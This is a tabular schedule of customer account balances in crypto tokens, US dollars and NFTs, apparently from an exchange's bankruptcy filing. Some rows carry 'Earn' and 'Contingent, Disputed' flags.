| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07348997 | | USD[10.00] | | |
| 07348998 | | USD[10.00] | | |
| 07349000 | | USD[0.00] | | |
| 07349001 | | USD[10.00] | | |
| 07349002 | | DOGE[332.61449278], SOL[.27742214], USD[3.75] | | |
| 07349003 | | BRZ[2], CUSDT[2], DOGE[1], GRT[2], TRX[4], USD[0.01] | | |
| 07349004 | | DOGE[.08842775], USD[0.00] | | |
| 07349005 | | USD[10.00] | | |
| 07349006 | | USD[10.00] | | |
| 07349007 | | KSHIB[138.18777784], USD[0.00] | | |
| 07349008 | | CUSDT[1], TRX[2.00000017], USD[0.00], USDT[0] | | |
| 07349011 | | USD[10.00] | | |
| 07349012 | | USD[10.00] | | |
| 07349013 | | USD[10.00] | | |
| 07349014 | | DOGE[0], GRT[58.98450644], LTC[0], MATIC[31.75305608], SUSHI[0], TRX[1], USD[0.08] | Yes | |
| 07349015 | | BRZ[1], CUSDT[2], GRT[1], TRX[3], USD[10.00] | | |
| 07349016 | | USD[10.00] | | |
| 07349017 | | CUSDT[4], DOGE[.00001817], TRX[.00006435], USD[0.01], USDT[.00015582] | | |
| 07349018 | | USD[10.00] | | |
| 07349020 | | USD[10.00] | | |
| 07349021 | | USD[10.00] | | |
| 07349022 | | BTC[0], SOL[0], USD[1.13], USDT[0.00000021] | | |
| 07349024 | | USD[10.00] | | |
| 07349025 | | USD[10.00] | | |
| 07349026 | | USD[10.00] | | |
| 07349027 | | GRT[4.59919082], USD[0.00] | | |
| 07349028 | | DOGE[5.1419778], GRT[0], TRX[2], USD[0.00] | Yes | |
| 07349030 | | USD[10.00] | | |
| 07349031 | | USD[10.00] | | |
| 07349034 | | TRX[177.72760096], USD[0.00] | Yes | |
| 07349035 | | DOGE[19.11298472], USD[0.00] | | |
| 07349036 | | BTC[.00000018], USD[0.00] | | |
| 07349037 | | USD[10.00] | | |
| 07349038 | | BRZ[1], CUSDT[2], USD[0.00] | | |
| 07349040 | | USD[10.00] | | |
| 07349043 | | CUSDT[1], USD[0.00] | | |
| 07349044 | | USD[10.00] | | |
| 07349045 | | USD[10.00] | | |
| 07349046 | | BAT[1], USD[0.00] | | |
| 07349047 | | BTC[.0031064], USD[0.00] | Yes | |
| 07349048 | | BAT[1], CUSDT[1], GRT[2], TRX[1], USD[0.01] | | |
| 07349049 | | USD[10.00] | | |
| 07349050 | | USD[10.00] | | |
| 07349051 | | USD[10.00] | | |
| 07349052 | | USD[10.00] | | |
| 07349053 | | BTC[0.15020292], DOGE[0], USD[11.03], USDT[1.1027105] | Yes | |
| 07349054 | | CUSDT[2], USD[0.00] | | |
| 07349056 | | USD[10.00] | | |
| 07349057 | | DOGE[28.91282732], USD[0.00] | | |
| 07349058 | | BCH[0], BRZ[0], DOGE[0], ETH[0], ETHW[0], USD[0.00] | | |
| 07349061 | | CUSDT[3], ETHW[.0306169], SHIB[5], SOL[.00000001], USD[0.00] | Yes | |
| 07349062 | | USD[0.00] | | |
| 07349063 | | BTC[0], ETH[0], LINK[0], USD[0.00], USDT[0.00000691] | | |
| 07349064 | | USD[10.00] | | |
| 07349065 | | BRZ[3], CUSDT[4], ETH[0.04285977], ETHW[0.04232625], GRT[1.00498957], TRX[3], USD[0.00] | Yes | |
| 07349066 | | USD[10.00] | | |
| 07349068 | | DOGE[2.31516784], USD[0.00] | | |
| 07349069 | | USD[10.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07349070 | | USD[10.00] | | |
| 07349071 | | CUSDT[4], TRX[.00003468], USD[0.00] | | |
| 07349073 | | CUSDT[.00006589], USD[9.68] | | |
| 07349074 | | SHIB[598923.28951445], USD[0.00] | | |
| 07349075 | | DOGE[2.0004294], USD[0.00] | | |
| 07349076 | | USD[10.00] | | |
| 07349077 | | CUSDT[2], USD[0.00] | Yes | |
| 07349078 | | CUSDT[1], TRX[0], USD[0.00] | Yes | |
| 07349079 | | USD[0.00] | | |
| 07349081 | | DOGE[2], USD[107.12] | | |
| 07349082 | | USD[10.00] | | |
| 07349083 | | BAT[63.65957759], BRZ[3], BTC[.00122328], CUSDT[16], DOGE[299.12355827], ETH[.03047092], ETHW[.03008876], GRT[.00619555], LINK[12.88770508], SOL[3.13967669], SUSHI[.00872707], TRX[11514.49393711], UNI[8.47396063], USD[0.00] | Yes | |
| 07349084 | | USD[10.00] | | |
| 07349085 | | ETH[0], GRT[0], SOL[0], TRX[0], USD[0.00] | | |
| 07349086 | | USD[10.00] | | |
| 07349087 | | USD[10.00] | | |
| 07349088 | | LINK[0], SOL[0], USD[0.00], USDT[0] | | |
| 07349089 | | USD[10.00] | | |
| 07349090 | | USD[10.00] | | |
| 07349091 | | BRZ[1], CUSDT[1], DOGE[916.42095017], TRX[1], USD[0.00] | | |
| 07349092 | | BRZ[3], CUSDT[3], ETH[0], TRX[8.00087675], USD[0.01], USDT[1.09415384] | Yes | |
| 07349093 | | USD[10.77] | Yes | |
| 07349094 | | USD[10.00] | | |
| 07349095 | | BRZ[1], CUSDT[3], GRT[1], TRX[8], USD[0.01] | | |
| 07349097 | | USD[10.00] | | |
| 07349098 | | USD[10.00] | | |
| 07349099 | | USD[10.00] | | |
| 07349100 | | USD[10.00] | | |
| 07349101 | | CUSDT[1], DOGE[1], ETH[0], SOL[0], SUSHI[0], USD[0.00] | | |
| 07349102 | | USD[10.00] | | |
| 07349103 | | USD[10.00] | | |
| 07349104 | | USD[10.00] | | |
| 07349105 | | USD[10.00] | | |
| 07349106 | | USD[10.00] | | |
| 07349107 | | USD[0.01], USDT[0] | | |
| 07349108 | | DOGE[.00002653], USD[0.01], USDT[0] | | |
| 07349109 | | USD[0.00] | | |
| 07349110 | | DOGE[180.99976669], USD[0.00] | | |
| 07349111 | | CUSDT[1], DOGE[669.01348896], USD[0.00] | Yes | |
| 07349112 | | USD[0.00] | | |
| 07349113 | | USD[10.00] | | |
| 07349114 | | USD[10.00] | | |
| 07349115 | | USD[10.00] | | |
| 07349116 | | USD[10.00] | | |
| 07349117 | | USD[10.00] | | |
| 07349118 | | USD[0.00] | Yes | |
| 07349119 | | SUSHI[.32121767], TRX[45.08565251], USD[0.01] | | |
| 07349121 | | USD[10.00] | | |
| 07349122 | | USD[10.00] | | |
| 07349123 | | USD[0.01] | | |
| 07349124 | | USD[10.00] | | |
| 07349125 | | CUSDT[2], DOGE[0], ETH[0], SHIB[.00000002], TRX[0], USD[0.00] | Yes | |
| 07349126 | | USD[10.00] | | |
| 07349127 | | BAT[1], BRZ[1], CUSDT[1], DOGE[.35490401], GRT[1], TRX[2], USD[0.01] | | |
| 07349128 | | USD[10.00] | | |
| 07349129 | | DOGE[52.58800796], USD[-1.33] | | |
| 07349131 | | CUSDT[2], DOGE[.46301871], USD[0.00] | | |
| 07349132 | | CUSDT[1], DOGE[.00003338], USD[0.01] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07349133 | | USD[10.00] | | |
| 07349135 | | USD[10.00] | | |
| 07349136 | | BTC[0], DOGE[10.85875324], ETH[0], SOL[0.03086485], USD[0.00], USDT[0.00007961] | | |
| 07349138 | | BRZ[3], BTC[0.00119298], DOGE[1195.12220591], TRX[1], USD[0.00], USDT[0] | Yes | |
| 07349139 | | DOGE[0], ETH[0], USD[0.00] | | |
| 07349141 | | USD[10.00] | | |
| 07349144 | | USD[10.00] | | |
| 07349145 | | USD[10.00] | | |
| 07349146 | | USD[10.00] | | |
| 07349147 | | USD[10.00] | | |
| 07349148 | | DOGE[5.13784712], USD[0.00] | Yes | |
| 07349149 | | BAT[1], BRZ[1], BTC[0], CUSDT[2], DOGE[352.36371811], ETH[0.00521685], TRX[0], USD[0.00] | | |
| 07349150 | | DOGE[1], USD[0.01] | | |
| 07349151 | | USD[10.00] | | |
| 07349152 | | USD[10.00] | | |
| 07349153 | | USD[10.00] | | |
| 07349154 | | BRZ[1], BTC[0], CUSDT[1], DOGE[1], LINK[23.94283041], SHIB[1], SOL[0], USD[0.00] | Yes | |
| 07349155 | | USD[10.00] | | |
| 07349156 | | USD[0.00] | | |
| 07349157 | | DOGE[646.79545957], USD[0.00] | | |
| 07349158 | | USD[0.00] | | |
| 07349159 | | USD[10.00] | | |
| 07349160 | | USD[0.00] | | |
| 07349161 | | CUSDT[1], DOGE[1568.70213601], USD[0.00] | | |
| 07349162 | Contingent, Disputed | USD[0.00] | Yes | |
| 07349164 | | CUSDT[1], DOGE[3633.55668421], USD[0.00] | Yes | |
| 07349165 | | USD[10.00] | | |
| 07349166 | | BAT[0.00675212], BRZ[0], CUSDT[7], DAI[0.00003652], DOGE[2], GRT[0.00204012], SOL[0.00024522], TRX[0], USD[0.06], USDT[0.00480326] | Yes | |
| 07349167 | | BRZ[1], CUSDT[1], DOGE[1], TRX[2], USD[0.00] | | |
| 07349168 | | USD[10.00] | | |
| 07349170 | | USD[10.00] | | |
| 07349172 | | USD[10.00] | | |
| 07349174 | | LINK[.38824406], USD[0.00] | Yes | |
| 07349175 | | USD[10.00] | | |
| 07349176 | | BTC[.000204036], USD[0.00] | | |
| 07349178 | | CUSDT[1], USD[0.01] | | |
| 07349180 | | CUSDT[1], DOGE[0], TRX[4], USD[0.01] | | |
| 07349181 | | ETH[.00000502], ETHW[.00000502], USD[0.00] | | |
| 07349182 | | USD[10.00] | | |
| 07349183 | | USD[0.00] | | |
| 07349184 | | BRZ[50.16281092], USD[0.00] | | |
| 07349185 | | BCH[0], BTC[0], DOGE[0], ETH[0], LINK[0], SHIB[143.79879879], USD[66.51], USDT[0.00000001], YFI[0] | Yes | |
| 07349186 | | USD[10.00] | | |
| 07349187 | | DOGE[1456.65712194], USD[0.00] | | |
| 07349188 | | USD[10.00] | | |
| 07349190 | | DOGE[199.58206716], TRX[1], USD[0.01] | | |
| 07349191 | | USD[10.00] | | |
| 07349192 | | USD[10.00] | | |
| 07349194 | | USD[10.00] | | |
| 07349195 | | USD[10.00] | | |
| 07349196 | | BRZ[2], CUSDT[5], DOGE[1136.14926441], ETH[.75955374], ETHW[.75923472], GRT[2.00367791], LINK[7.25022726], USD[0.00] | Yes | |
| 07349197 | | BTC[0], DOGE[3.81689709], GRT[0], LTC[0], SOL[0], TRX[0], USD[0.00] | | |
| 07349199 | | USD[10.00] | | |
| 07349200 | | TRX[200.29868539], USD[0.00] | | |
| 07349201 | | BRZ[1], DOGE[513.79420829], MATIC[76.85237293], TRX[2], USD[162.81], USDT[0] | Yes | |
| 07349202 | | CUSDT[1], DOGE[2899.81096388], GRT[1.00498957], USD[0.00], USDT[1.10821254] | Yes | |
| 07349203 | | USD[10.00] | | |
| 07349204 | | BTC[.00000003], CUSDT[2], DOGE[1.08857189], USD[0.00] | Yes | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07349205 | | USD[10.00] | | |
| 07349206 | | USD[0.01] | | |
| 07349207 | | BRZ[23.57478124], CUSDT[2], USD[50.01] | | |
| 07349208 | | BTC[.00011914], CUSDT[12.71104946], DOGE[0.00167762], TRX[2], USD[0.00] | Yes | |
| 07349209 | | BTC[0], USD[0.00], USDT[0] | | |
| 07349210 | | USD[10.00] | | |
| 07349211 | | USD[0.00] | | |
| 07349212 | | CUSDT[1], DOGE[3], SOL[1.8400481], SUSHI[.57029076], TRX[843.95129295], USD[0.01] | | |
| 07349213 | | USD[10.00] | | |
| 07349215 | | USD[10.00] | | |
| 07349216 | | USD[47.79] | | |
| 07349217 | | BRZ[1], CUSDT[2], MATIC[115.02306842], TRX[1], USD[0.00], USDT[0] | | |
| 07349218 | | USD[10.00] | | |
| 07349219 | | DOGE[147.20984385], USD[0.00] | | |
| 07349220 | | USD[10.00] | | |
| 07349221 | | BTC[.02930379], DOGE[2289.87089031], SHIB[4213971.71903899], USD[503.96], USDT[4.46425565] | Yes | |
| 07349223 | | CUSDT[1], ETH[.00525561], ETHW[.00525561], USD[0.00] | | |
| 07349224 | | BRZ[4], CUSDT[21], DOGE[19.91233394], ETH[0], ETHW[0], GRT[1.00177328], SOL[2.98285838], SUSHI[0], TRX[7], UNI[0], USD[0.00], USDT[1.08650665] | Yes | |
| 07349226 | | USD[10.00] | | |
| 07349227 | | BRZ[3], CUSDT[21], ETHW[.02605944], TRX[10], USD[138.92] | | |
| 07349228 | | USD[10.00] | | |
| 07349229 | | USD[10.61] | Yes | |
| 07349230 | | BAT[1], BRZ[4], CUSDT[12], DOGE[1], ETH[0], ETHW[0], TRX[1], USD[0.00], USDT[0.00001511] | | |
| 07349231 | | USD[10.00] | | |
| 07349232 | | USD[10.00] | | |
| 07349233 | | CUSDT[2], DOGE[.08829799], TRX[3], USD[0.01] | | |
| 07349234 | | USD[10.00] | | |
| 07349235 | | USD[10.00] | | |
| 07349236 | | USD[10.00] | | |
| 07349237 | | TRX[10104.17263291], USD[11.08] | Yes | |
| 07349238 | | USD[10.00] | | |
| 07349239 | | DOGE[2104.59939838], USD[0.00] | | |
| 07349240 | | GRT[4.80883956], USD[0.00] | | |
| 07349241 | | USD[10.48] | Yes | |
| 07349242 | | USD[10.00] | | |
| 07349243 | | USD[0.00] | | |
| 07349244 | | USD[10.00] | | |
| 07349245 | | USD[10.00] | | |
| 07349247 | | CUSDT[1], DOGE[1], ETH[.00374063], ETHW[.00374063], USD[0.05] | | |
| 07349248 | | USD[0.00], USDT[0.00000001] | | |
| 07349249 | | KSHIB[0], SHIB[212663.51096915], SOL[0], USD[0.01] | | |
| 07349250 | | BAT[0], BRZ[2], CUSDT[22], DOGE[0], GRT[0], TRX[4888.06563834], USD[0.00] | Yes | |
| 07349251 | | USD[10.00] | | |
| 07349252 | | USD[10.00] | | |
| 07349253 | | CUSDT[1], DOGE[1], USD[0.00] | Yes | |
| 07349254 | | USD[10.00] | | |
| 07349255 | | BAT[1], BRZ[3], CUSDT[9], DOGE[1], SHIB[1], TRX[.000001], USD[0.00] | Yes | |
| 07349256 | | DOGE[74.54858409], USD[0.00] | | |
| 07349257 | | BRZ[1], BTC[0], CUSDT[5], TRX[1], USD[98.33] | | |
| 07349258 | | USD[10.00] | | |
| 07349259 | | BRZ[3], BTC[0], CUSDT[2], DOGE[0.00001326], TRX[6], USD[10.99], USDT[0] | | |
| 07349260 | | CUSDT[4], DOGE[1301.90911091], SHIB[34618616.97338120], USD[0.00] | | |
| 07349261 | Contingent, Disputed | USD[0.00], USDT[0] | | |
| 07349262 | | USD[10.00] | | |
| 07349263 | | DOGE[147.83422657], USD[0.00] | Yes | |
| 07349264 | | BAT[3.40344436], BRZ[10.86824153], DOGE[1713.30120846], ETH[.00469141], ETHW[.00469141], SOL[2.11213181], SUSHI[1.035695], TRX[5.79242029], UNI[0.0095155], USD[0.38] | | |
| 07349265 | | BAT[.07979835], CUSDT[3], DOGE[24.44281492], TRX[4], USD[0.00], USDT[0] | | |
| 07349266 | | ETH[0], SOL[0], USD[673.64], USDT[0.00000012] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07349268 | | USD[10.00] | | |
| 07349269 | | USD[10.00] | | |
| 07349270 | | USD[10.00] | | |
| 07349271 | | USD[0.05] | | |
| 07349272 | | CUSDT[1], DOGE[15.49168474], USD[0.00] | Yes | |
| 07349273 | | USD[10.00] | | |
| 07349274 | | TRX[0], USD[0.00] | | |
| 07349275 | | USD[10.00] | | |
| 07349276 | | AAVE[.00000001], AVAX[.00038478], CUSDT[5], ETH[0], SOL[0], TRX[2], USD[0.01], USDT[0.00000017] | Yes | |
| 07349277 | | USD[10.00] | | |
| 07349278 | | USD[0.45] | | |
| 07349279 | | USD[10.00] | | |
| 07349280 | | USD[10.00] | | |
| 07349281 | | USD[10.00] | | |
| 07349282 | | USD[10.00] | | |
| 07349283 | | USD[11.04] | Yes | |
| 07349284 | | USD[10.00] | | |
| 07349285 | | USD[10.00] | | |
| 07349286 | | USD[10.00] | | |
| 07349287 | | DOGE[1.00000524], USD[0.00] | | |
| 07349288 | | CUSDT[1], TRX[7], USD[0.00], USDT[0.00000001] | Yes | |
| 07349289 | | USD[11.06] | Yes | |
| 07349290 | | USD[10.00] | | |
| 07349291 | | USD[10.00] | | |
| 07349292 | | BTC[.00025945], USD[0.00] | | |
| 07349293 | | USD[0.00], USDT[9.94805028] | | |
| 07349294 | | CUSDT[1], DOGE[3484.19349961], USD[0.12] | | |
| 07349295 | | DOGE[1], ETHW[1.40409075], SHIB[2108.95869523], TRX[0], USD[0.00], USDT[0] | Yes | |
| 07349296 | | DOGE[0], ETH[0], SHIB[17900.11221233], TRX[0], USD[0.00], USDT[0] | Yes | |
| 07349297 | | USD[10.00] | | |
| 07349298 | | USD[10.85] | Yes | |
| 07349301 | | USD[10.00] | | |
| 07349302 | | USD[10.00] | | |
| 07349303 | | USD[10.00] | | |
| 07349304 | | USD[10.00] | | |
| 07349305 | | CUSDT[4], DOGE[132.42372403], TRX[16.53062771], USD[0.00] | Yes | |
| 07349308 | | USD[10.00] | | |
| 07349310 | | TRX[178.09569045], USD[0.00] | | |
| 07349311 | | TRX[.28633832], USD[0.00] | Yes | |
| 07349313 | | BTC[.00001648], CUSDT[13], USD[0.00], USDT[0] | | |
| 07349314 | | USD[10.00] | | |
| 07349315 | | DOGE[311.18381137], USD[0.00] | | |
| 07349316 | | USD[10.00] | | |
| 07349317 | | USD[10.00] | | |
| 07349318 | | USD[0.21], USDT[0] | | |
| 07349320 | | CUSDT[1], GRT[1.04339317], USD[0.00] | Yes | |
| 07349321 | | BRZ[2], CUSDT[2], TRX[1], USD[0.01] | | |
| 07349322 | | CUSDT[5], TRX[.06620644], USD[0.00], USDT[1] | | |
| 07349324 | | USD[10.00] | | |
| 07349325 | | USD[10.00] | | |
| 07349327 | | USD[10.86] | Yes | |
| 07349328 | | TRX[163.91978093], USD[0.00] | | |
| 07349329 | | USD[10.00] | | |
| 07349330 | | USD[10.00] | | |
| 07349331 | | USD[10.00] | | |
| 07349332 | | USD[10.00] | | |
| 07349333 | | BRZ[1], BTC[.00031471], USD[45.62] | | |
| 07349334 | | CUSDT[2], DAI[18.66449245], DOGE[0], USD[0.00], USDT[0] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07349335 | | CUSDT[8], DOGE[22.21048221], USD[0.00] | Yes | |
| 07349336 | | BTC[.00015042], DOGE[1], USD[0.00] | | |
| 07349337 | | DOGE[21.14525268], USD[0.00] | | |
| 07349338 | | USD[10.00] | | |
| 07349339 | | USD[10.00] | | |
| 07349340 | | USD[10.00] | | |
| 07349341 | | USD[10.00] | | |
| 07349342 | | USD[10.00] | | |
| 07349343 | | USD[10.00] | | |
| 07349344 | | DOGE[382.464], SUSHI[.996], USD[0.00], USDT[.05666724] | | |
| 07349345 | | BAT[1], DOGE[1.29448842], USD[0.00] | | |
| 07349346 | | USD[10.00] | | |
| 07349347 | | DOGE[26.48472928], USD[0.00] | | |
| 07349348 | | BCH[0], BRZ[3], CUSDT[1.00181251], ETH[.35127418], ETHW[.35112652], KSHIB[43.051005], LINK[.00075802], SHIB[78575.90895976], TRX[17.56187107], UNI[.00057832], USD[0.00] | Yes | |
| 07349350 | | CUSDT[9], DOGE[12797.81025669], GRT[1], TRX[6], USD[0.36], USDT[0] | | |
| 07349352 | | CUSDT[1], DOGE[91.08297318], TRX[1], USD[0.02], USDT[0.00002690] | | |
| 07349353 | | USD[10.00] | | |
| 07349355 | | DOGE[.10620472], NFT (312407356869432022/Saudi Arabia Ticket Stub #1472)[1], NFT (500072959298561577/FTX - Off The Grid Miami #4201)[1], SHIB[0], SOL[0], USD[0.00], USDT[0.00000001] | | |
| 07349356 | | USD[10.00] | | |
| 07349357 | | USD[10.00] | | |
| 07349358 | | DOGE[1], GRT[11.62804645], TRX[2], USD[0.34] | | |
| 07349359 | | CUSDT[4], GRT[20.93088955], USD[0.00] | | |
| 07349360 | | USD[10.00] | | |
| 07349361 | | BRZ[1], DOGE[46243.14862012], TRX[2], USD[0.00] | | |
| 07349362 | | USD[10.00] | | |
| 07349364 | | CUSDT[2], DOGE[1], TRX[2], USD[0.00] | Yes | |
| 07349365 | | CUSDT[1], USD[0.00] | | |
| 07349366 | | TRX[202.07592598], USD[0.00] | | |
| 07349367 | | USD[10.00] | | |
| 07349368 | | USD[0.01], USDT[0] | | |
| 07349369 | | USD[10.00] | | |
| 07349370 | | USD[10.00] | | |
| 07349371 | | BTC[0], ETH[0], ETHW[0.64903797], NFT (303651562055036588/MagicEden Vaults)[1], NFT (330992902352030603/MagicEden Vaults)[1], NFT (331598485813300383/MagicEden Vaults)[1], NFT (351325595583539575/MagicEden Vaults)[1], NFT (391285120749168042/GGSG Brawler Skin)[1], NFT (429285818580264361/MagicEden Vaults)[1], NFT (440217670328541193/Geckos Spaceship)[1], NFT (471153285253030584/Geckos Spaceship)[1], NFT (496577044045840866/Geckos Spaceship)[1], NFT (529163192373264126/Geckos Spaceship)[1], NFT (534200273445610315/Galactic Gecko #5028)[1], SUSHI[6.4755], TRX[.424], USD[2.59015758] | | |
| 07349372 | | BCH[0], BRZ[0], BTC[0], DOGE[0], ETH[0], TRX[1.91884407], USD[0.00], USDT[0] | | |
| 07349374 | | USD[10.00] | | |
| 07349375 | | USD[10.00] | | |
| 07349376 | | USD[10.00] | | |
| 07349377 | | USD[10.00] | | |
| 07349378 | | BTC[.00003486], USD[0.00], USDT[0.00000001] | | |
| 07349379 | | USD[10.00] | | |
| 07349380 | | BTC[.00044919], DOGE[791.09836455], USD[-5.00] | | |
| 07349381 | | BTC[.00016811], USD[0.00] | | |
| 07349382 | | BAT[1.0165555], BRZ[2], CUSDT[4], DOGE[2367.37589404], ETH[.35855582], ETHW[.3584054], SOL[7.61296861], TRX[1], USD[0.00] | Yes | |
| 07349383 | | BTC[.00021253], USD[0.00] | | |
| 07349384 | | USD[10.00] | | |
| 07349385 | | BRZ[3], CUSDT[2], DOGE[3], EUR[0.00], TRX[2], USD[0.00], USDT[0] | | |
| 07349387 | | USD[10.00] | | |
| 07349388 | | USD[10.00] | | |
| 07349389 | | BAT[1.28447426], BRZ[2], BTC[.0000205], CUSDT[3.26979235], DOGE[1657.08389038], TRX[1.32816883], USD[0.69], USDT[0.64251039] | | |
| 07349390 | | GRT[3.94908949], USD[0.00] | | |
| 07349391 | | USD[10.00] | | |
| 07349392 | | DOGE[2], SUSHI[.77126752], USD[0.30] | Yes | |
| 07349393 | | BAT[1.01655549], BRZ[3], CUSDT[14], DOGE[.01081258], ETH[.00000066], ETHW[.00000066], SHIB[1], TRX[3], USD[0.00] | Yes | |
| 07349394 | | USD[10.00] | | |
| 07349395 | | DOGE[0], ETH[0], ETHW[0], USD[0.01] | | |
| 07349396 | | BRZ[0], BTC[0], DOGE[1], ETH[0], KSHIB[0], LTC[0], MATIC[0], SHIB[1712480.21947371], SOL[0.61762010], TRX[0], USD[0.00], USDT[0] | Yes | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07349397 | | BRZ[1], CUSDT[3], DOGE[671.85103132], USD[0.23] | | |
| 07349398 | | USD[10.00] | | |
| 07349399 | | BRZ[1], CUSDT[6], DOGE[1], TRX[3], USD[38.65] | | |
| 07349401 | | USD[10.00] | | |
| 07349402 | | BRZ[1], CUSDT[1], SHIB[671768.47892012], USD[0.00] | Yes | |
| 07349403 | | USD[10.00] | | |
| 07349404 | | USD[0.00] | | |
| 07349406 | | USD[10.00] | | |
| 07349407 | | CUSDT[1], DOGE[1], TRX[1], USD[0.00] | Yes | |
| 07349408 | | CUSDT[1], USD[0.00] | Yes | |
| 07349409 | | USD[10.00] | | |
| 07349410 | | USD[10.00] | | |
| 07349411 | | BTC[.00021423], USD[0.00] | | |
| 07349412 | | GRT[1], SOL[5.34880169], TRX[5611.81245735], USD[1000.00] | | |
| 07349414 | | USD[10.00] | | |
| 07349415 | | BTC[.004052], DOGE[.111971], SOL[.00437] | | |
| 07349416 | | CUSDT[8], DOGE[2], ETH[.00361554], ETHW[.0035745], TRX[2], USD[0.00] | Yes | |
| 07349417 | | DOGE[2], ETH[0], LINK[0], SHIB[5], SOL[0], TRX[3], USD[0.01], USDT[0] | Yes | |
| 07349418 | | TRX[.1084], USD[0.00] | | |
| 07349421 | | USD[10.00] | | |
| 07349422 | | USD[10.00] | | |
| 07349423 | | USD[10.00] | | |
| 07349426 | | USD[10.00] | | |
| 07349427 | | CUSDT[465.20416888], DOGE[925.3858531], ETH[.00325251], ETHW[.00325251], TRX[54.93540962], USD[0.00] | | |
| 07349428 | | TRX[2], USD[0.00] | | |
| 07349430 | | USD[10.00] | | |
| 07349431 | | DOGE[.00004442], USD[10.00] | | |
| 07349432 | | USD[10.00] | | |
| 07349434 | | USD[10.00] | | |
| 07349435 | | USD[10.00] | | |
| 07349436 | | CUSDT[1], SUSHI[0], USD[0.00] | Yes | |
| 07349437 | | DOGE[0], TRX[3227.45544741], USD[0.00] | | |
| 07349439 | | GRT[2], TRX[4], USD[0.01] | | |
| 07349440 | | USD[0.00] | | |
| 07349441 | | USD[10.00] | | |
| 07349442 | | BRZ[2], CUSDT[186.02107388], DOGE[1], TRX[4], USD[141.70] | Yes | |
| 07349443 | | DOGE[133.06296712], USD[0.00] | | |
| 07349444 | | USD[0.00], USDT[0.00000001] | | |
| 07349445 | | TRX[1], USD[0.02] | | |
| 07349446 | | BRZ[1], BTC[0], CUSDT[3], DOGE[0], ETH[0], ETHW[0], LINK[0], LTC[0], SOL[0], TRX[7], USD[0.00] | | |
| 07349447 | | USD[0.00] | | |
| 07349448 | | BRZ[1], BTC[.0524714], DOGE[1371.30921208], SHIB[0], USD[1.62] | Yes | |
| 07349449 | | DOGE[161.04340063], GRT[152.97485529], LTC[.15084996], SHIB[8810801.44388094], SOL[1.50575655], SUSHI[12.25718403], TRX[236.07055283], USD[2013.12], YFI[.00129143] | Yes | |
| 07349450 | | USD[10.00] | | |
| 07349451 | | USD[10.00] | | |
| 07349453 | | SOL[0], USDT[0] | | |
| 07349454 | | USD[10.00] | | |
| 07349455 | | ETH[.00542474], ETHW[.00542474], USD[0.00] | | |
| 07349456 | | DOGE[1], USD[0.01] | | |
| 07349457 | | BTC[.00029939], CUSDT[9], DOGE[2.00003084], GRT[77.41524675], MATIC[66.86909512], SHIB[288964.86248476], SOL[4.38947887], SUSHI[1.6992349], TRX[1007.95327926], USD[0.01], USDT[0.00008969] | Yes | |
| 07349460 | | BRZ[5], CUSDT[5], SOL[0], TRX[4], USD[0.00], USDT[1] | | |
| 07349462 | | USD[10.00] | | |
| 07349463 | | BRZ[0], BTC[0], DOGE[244.00340324], ETH[0], USD[0.00], USDT[0] | | |
| 07349465 | | USD[10.00] | | |
| 07349466 | | USD[10.00] | | |
| 07349467 | | BTC[.00191816], DOGE[17.27337592], USD[10.00] | | |
| 07349468 | | CUSDT[2], DOGE[893.72339846], USD[0.00] | Yes | |
| 07349469 | | USD[10.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07349471 | | CUSDT[2], DOGE[341.64601268], USD[0.00] | Yes | |
| 07349472 | | USD[10.00] | | |
| 07349473 | | USD[10.12] | Yes | |
| 07349474 | | USD[10.00] | | |
| 07349475 | | USD[10.00] | | |
| 07349476 | | USD[0.00] | | |
| 07349477 | | CUSDT[5.73928572], TRX[1], USD[0.00] | | |
| 07349478 | | USD[10.00] | | |
| 07349479 | | USD[10.00] | | |
| 07349480 | | BAT[1], DOGE[6556.28600492], USD[0.00] | | |
| 07349481 | | BRZ[2], CUSDT[1], SHIB[1], TRX[3], USD[0.00], USDT[1.10986328] | Yes | |
| 07349482 | | BTC[.00021622], USD[0.00] | | |
| 07349483 | | CUSDT[1], TRX[1], USD[0.00] | Yes | |
| 07349484 | | CUSDT[2], SUSHI[.66597738], USD[0.60], USDT[0.00000001] | | |
| 07349485 | | BAT[170.40198246], BRZ[3], CUSDT[95.08837702], DOGE[11842.84555084], GRT[1.00498957], SHIB[24798849.81084956], TRX[2.05862306], USD[3.50] | Yes | |
| 07349486 | | CUSDT[9], DOGE[487.3237326], LTC[2.39308017], MATIC[42.87632983], SOL[7.45977335], SUSHI[5.75053177], TRX[362.67205094], USD[0.00] | Yes | |
| 07349487 | | USD[10.00] | | |
| 07349488 | | BAT[1], CUSDT[1], DOGE[8418.00275271], SHIB[3], USD[544.24] | | |
| 07349489 | | DOGE[1.00003377], USD[0.00] | | |
| 07349490 | | USD[0.05] | | |
| 07349491 | | USD[10.00] | | |
| 07349492 | | CUSDT[1], DOGE[148.20751898], USD[0.00] | | |
| 07349493 | | DOGE[303.00299069], USD[0.00] | | |
| 07349495 | | USD[6.97] | | |
| 07349496 | | USD[10.00] | | |
| 07349497 | | USD[10.00] | | |
